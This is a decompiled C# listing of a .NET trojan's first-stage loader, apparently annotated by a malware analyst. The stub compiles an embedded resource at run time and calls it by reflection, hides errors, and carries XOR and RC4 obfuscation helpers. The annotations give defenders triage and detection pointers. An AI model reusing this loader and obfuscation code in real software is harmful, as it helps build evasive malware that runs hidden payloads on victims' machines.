// Decompiled with JetBrains decompiler
// Type: UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ
// Assembly: [2010-06-13] CG_QTTask, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 86ADDFF4-806D-4CF9-AAD0-F2BF223801EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aakd-96f6bdd657e1d74f1acd0cbd94cc352ca144d9145acce016b7f711c50bab97f6.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
// Analyst annotations (added for review; the code tokens are unchanged from the decompiler output).
//
// What this type does, as far as the visible code shows:
//   1. Main() reads the FIRST embedded manifest resource of the running assembly as text.
//   2. It replaces the literal placeholder "__PATH__" (including its quotes) with the quoted
//      on-disk path of the running executable.
//   3. The resulting text is compiled at run time as Visual Basic source (VBCodeProvider,
//      GenerateInMemory = true, GenerateExecutable = false).
//   4. A public static method named "iOlEdEPJbLhRchepHVdenMGjlSYrzp" on the compiled type
//      "RovDhttJNQIgvoYGJdGKYUERqqSamP" is invoked through late-bound reflection.
// The real behaviour therefore lives in the embedded resource, which is not part of this listing.
//
// Triage pointers for defenders:
//   - Static: references to System.CodeDom.Compiler / VBCodeProvider together with
//     GetManifestResourceStream and a late-bound "InvokeMember" call in a small stub with
//     randomised identifiers.
//   - Behavioural: on .NET Framework the CodeDom providers normally run the command-line
//     compiler (vbc.exe) as a child process and stage files in the temp directory even when
//     GenerateInMemory is set, so a non-developer process spawning vbc.exe is a practical
//     signal. Confirm against the runtime actually in use.
//   - All exceptions are swallowed (see the catch blocks), so a failed compile is silent.
//
// NOTE(review): several locals below ("str", "compilerResults", "index3") are read before being
// assigned. That is a decompiler artifact of VB's default-initialised locals; this C# rendering
// would not pass definite-assignment checks as written.
[StandardModule]
internal sealed class UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ
{
    // Debug switch that gates every MsgBox call in this class. It is initialised to false and
    // never written elsewhere in the visible code, so the message boxes are dead in this build.
    private static bool dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq = false;

    /// <summary>
    /// Entry point: loads the embedded source text, patches in the executable's own path,
    /// then hands the text and the target type name to the compile-and-invoke routine.
    /// </summary>
    [STAThread]
    public static void Main()
    {
        if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
        {
            int num = (int) Interaction.MsgBox((object) "eYqnKtFLHSjkGHRoVyOuCUcSxstrwhbiMnYosvmMoUEznJypEO");
        }
        // Name of the type that is looked up in the run-time-compiled assembly.
        string UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName = "RovDhttJNQIgvoYGJdGKYUERqqSamP";
        // The quoted token "__PATH__" in the embedded source is replaced by the quoted location
        // of this assembly, i.e. the second stage is told where the stub lives on disk.
        UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.rBNoJnMeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJ(UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.MeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlG().Replace("\"__PATH__\"", "\"" + Assembly.GetExecutingAssembly().Location + "\""), UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName);
    }

    /// <summary>
    /// Returns the full text of the first manifest resource embedded in the executing assembly,
    /// or an empty string when the resource stream cannot be opened.
    /// </summary>
    /// <returns>The resource content read with a default StreamReader.</returns>
    public static string MeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlG()
    {
        Assembly executingAssembly = Assembly.GetExecutingAssembly();
        // Index 0 is taken unconditionally; an assembly with no resources would throw here.
        string manifestResourceName = executingAssembly.GetManifestResourceNames()[0];
        Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
        // The reader and stream are never disposed.
        return manifestResourceStream == null ? "" : new StreamReader(manifestResourceStream).ReadToEnd();
    }

    /// <summary>
    /// Compiles the given text as Visual Basic source into a library (not an executable),
    /// referencing System.dll, System.Windows.Forms.dll, System.Data.dll and
    /// Microsoft.VisualBasic.dll.
    /// </summary>
    /// <param name="gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl">Compiler options supplied by the caller; mutated here.</param>
    /// <param name="EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK">Source text to compile.</param>
    /// <returns>The compiler results; left unassigned when an exception was caught.</returns>
    private static CompilerResults VcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepjCkIrCIEQgvDFOl(
        CompilerParameters gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl,
        string EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK)
    {
        CompilerResults compilerResults;
        try
        {
            VBCodeProvider vbCodeProvider = new VBCodeProvider();
            gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.GenerateExecutable = false;
            gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.dll");
            gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.Windows.Forms.dll");
            gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.Data.dll");
            gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
            compilerResults = vbCodeProvider.CompileAssemblyFromSource(gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl, EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK);
        }
        catch (Exception ex)
        {
            // VB-style error bookkeeping; the exception is only surfaced when the debug flag is set.
            ProjectData.SetProjectError(ex);
            Exception exception = ex;
            if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
            {
                int num = (int) Interaction.MsgBox((object) exception.Message);
            }
            ProjectData.ClearProjectError();
        }
        return compilerResults;
    }

    /// <summary>
    /// Compiles the source text in memory, resolves the named type in the resulting assembly
    /// and passes that type to the late-bound invoker. Any failure is swallowed.
    /// </summary>
    /// <param name="YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf">Visual Basic source text.</param>
    /// <param name="UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName">Name of the type to resolve in the compiled assembly.</param>
    private static void rBNoJnMeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJ(
        string YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf,
        string UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName)
    {
        CompilerParameters gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl = new CompilerParameters();
        // In-memory output, no debug symbols, warnings tolerated.
        gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.GenerateInMemory = true;
        gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.IncludeDebugInformation = false;
        gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.TreatWarningsAsErrors = false;
        try
        {
            // compile -> CompiledAssembly -> GetType(name) -> late-bound invoke
            UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.DKbCBRHKCaDigODXNEScLLxxZhuWqVtLXMJDVSpZjplwOPkmvT((object) UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.VcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepjCkIrCIEQgvDFOl(gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl, YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf).CompiledAssembly.GetType(UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName));
        }
        catch (Exception ex)
        {
            // Same silent-failure pattern as the compile helper.
            ProjectData.SetProjectError(ex);
            Exception exception = ex;
            if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
            {
                int num = (int) Interaction.MsgBox((object) exception.Message);
            }
            ProjectData.ClearProjectError();
        }
    }

    /// <summary>
    /// Late-bound call of "InvokeMember" on the supplied object with the arguments
    /// (method name, Static | Public | InvokeMethod, null, null, null).
    /// </summary>
    /// <param name="yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg">
    /// The only caller in this class passes the System.Type resolved from the compiled assembly,
    /// so this amounts to invoking that type's public static method with no arguments.
    /// </param>
    private static void DKbCBRHKCaDigODXNEScLLxxZhuWqVtLXMJDVSpZjplwOPkmvT(
        object yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg)
    {
        BindingFlags bindingFlags1 = BindingFlags.Static | BindingFlags.Public | BindingFlags.InvokeMethod;
        object Instance = yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg;
        object[] objArray = new object[5]
        {
            // Name of the method invoked in the second stage.
            (object) "iOlEdEPJbLhRchepHVdenMGjlSYrzp",
            (object) bindingFlags1,
            (object) null,
            (object) null,
            (object) null
        };
        object[] Arguments = objArray;
        bool[] flagArray = new bool[5]
        {
            false,
            true,
            false,
            false,
            false
        };
        bool[] CopyBack = flagArray;
        // Going through NewLateBinding keeps the reflection call out of the stub's static
        // call graph: only the string "InvokeMember" appears.
        NewLateBinding.LateCall(Instance, (Type) null, "InvokeMember", Arguments, (string[]) null, (Type[]) null, CopyBack, true);
        // Copy-back of the by-ref argument emitted by the VB compiler; bindingFlags2 is never used.
        if (!flagArray[1])
            return;
        BindingFlags bindingFlags2 = (BindingFlags) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (BindingFlags));
    }

    // String and byte obfuscation helpers. None of them is called from the loader path in the
    // enclosing class; whether the second stage uses them cannot be determined from this listing.
    public class QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj
    {
        /// <summary>
        /// Encodes text by XOR-ing each character code with a repeating key character and
        /// emitting the result as a two-digit hexadecimal pair per input character.
        /// </summary>
        /// <param name="DataIn">Text to encode.</param>
        /// <param name="CodeKey">Repeating key; an empty key makes the modulo divide by zero.</param>
        /// <returns>Concatenated hex pairs.</returns>
        public static string YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(
            string DataIn,
            string CodeKey)
        {
            long num = (long) Strings.Len(DataIn);
            long Start = 1;
            string str;
            while (Start <= num)
            {
                // Positions are 1-based (Strings.Mid); the key position is (Start mod keyLength) + 1.
                string Expression = Conversion.Hex(Strings.Asc(Strings.Mid(DataIn, checked ((int) Start), 1)) ^ Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (Start % (long) Strings.Len(CodeKey)) + 1L)), 1)));
                // Left-pad single-digit values so every character yields exactly two hex digits.
                if (Strings.Len(Expression) == 1)
                    Expression = "0" + Expression;
                str += Expression;
                checked { ++Start; }
            }
            return str;
        }

        /// <summary>
        /// Inverse of the string encoder above: reads the input two hex digits at a time,
        /// XORs each value with the same repeating key position and converts back to a character.
        /// </summary>
        /// <param name="DataIn">Hex-pair text.</param>
        /// <param name="CodeKey">Repeating key; must match the one used for encoding.</param>
        /// <returns>Decoded text.</returns>
        public static string CkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtt(
            string DataIn,
            string CodeKey)
        {
            // Number of hex pairs in the input.
            long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
            long num2 = 1;
            string str;
            while (num2 <= num1)
            {
                // Parse the pair at 1-based offset 2*num2 - 1 as a hexadecimal number.
                int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
                int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
                str += Conversions.ToString(Strings.Chr(num3 ^ num4));
                checked { ++num2; }
            }
            return str;
        }

        /// <summary>
        /// Byte-array overload: applies Proper_RC4 with the key string converted via Encoding.Default.
        /// </summary>
        /// <param name="Input">Bytes to transform.</param>
        /// <param name="Key">Key text; its byte form depends on the platform's default encoding.</param>
        /// <returns>Transformed bytes, same length as the input.</returns>
        public static byte[] YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(
            byte[] Input,
            string Key)
        {
            return UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj.Proper_RC4(Input, Encoding.Default.GetBytes(Key));
        }

        /// <summary>
        /// Byte-array counterpart of the overload above; it simply forwards to it, which is
        /// consistent with a stream cipher where the same XOR operation encrypts and decrypts.
        /// </summary>
        /// <param name="Input">Bytes to transform.</param>
        /// <param name="Key">Key text.</param>
        /// <returns>Transformed bytes.</returns>
        public static byte[] CkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtt(
            byte[] Input,
            string Key)
        {
            return UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj.YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(Input, Key);
        }

        /// <summary>
        /// Keystream XOR over the input using a 256-entry state table: an identity fill, a
        /// key-scheduling pass of 256 swaps, then one swap and one output byte per input byte.
        /// The structure matches RC4, as the method name says; no keystream bytes are discarded.
        /// </summary>
        /// <param name="Input">Bytes to transform.</param>
        /// <param name="Key">Key bytes; a zero-length key makes the modulo divide by zero.</param>
        /// <returns>A new array of the same length as the input.</returns>
        public static byte[] Proper_RC4(byte[] Input, byte[] Key)
        {
            // State table, one entry per byte value.
            uint[] numArray1 = new uint[256];
            // Output buffer; the expression reduces to Input.Length.
            byte[] numArray2 = new byte[checked (Input.Length - 1 + 1)];
            uint index1 = 0;
            // Identity initialisation of the state table.
            do
            {
                numArray1[checked ((int) index1)] = index1;
                checked { ++index1; }
            }
            while (index1 <= (uint) byte.MaxValue);
            uint index2 = 0;
            // Key scheduling: mix the key into the table by swapping entries.
            do
            {
                // NOTE(review): index3 is declared inside the loop and read in its own initialiser.
                // Presumably the original kept it as a function-level local starting at 0 that
                // carries over between iterations; confirm against the IL.
                uint index3 = checked ((uint) ((long) (index3 + (uint) Key[(int) unchecked ((long) index2 % (long) Key.Length)] + numArray1[(int) index2]) & (long) byte.MaxValue));
                uint num = numArray1[checked ((int) index2)];
                numArray1[checked ((int) index2)] = numArray1[checked ((int) index3)];
                numArray1[checked ((int) index3)] = num;
                checked { ++index2; }
            }
            while (index2 <= (uint) byte.MaxValue);
            uint index4 = 0;
            uint index5 = 0;
            int num1 = checked (numArray2.Length - 1);
            int index6 = 0;
            // Keystream generation: advance both indices, swap, XOR the selected entry into the input byte.
            while (index6 <= num1)
            {
                index4 = checked ((uint) ((long) index4 + 1L & (long) byte.MaxValue));
                index5 = checked ((uint) ((long) (index5 + numArray1[(int) index4]) & (long) byte.MaxValue));
                uint num2 = numArray1[checked ((int) index4)];
                numArray1[checked ((int) index4)] = numArray1[checked ((int) index5)];
                numArray1[checked ((int) index5)] = num2;
                numArray2[index6] = checked ((byte) ((int) Input[index6] ^ unchecked ((int) numArray1[checked ((int) ((long) (numArray1[(int) index4] + numArray1[(int) index5]) & (long) byte.MaxValue))])));
                checked { ++index6; }
            }
            return numArray2;
        }
    }
}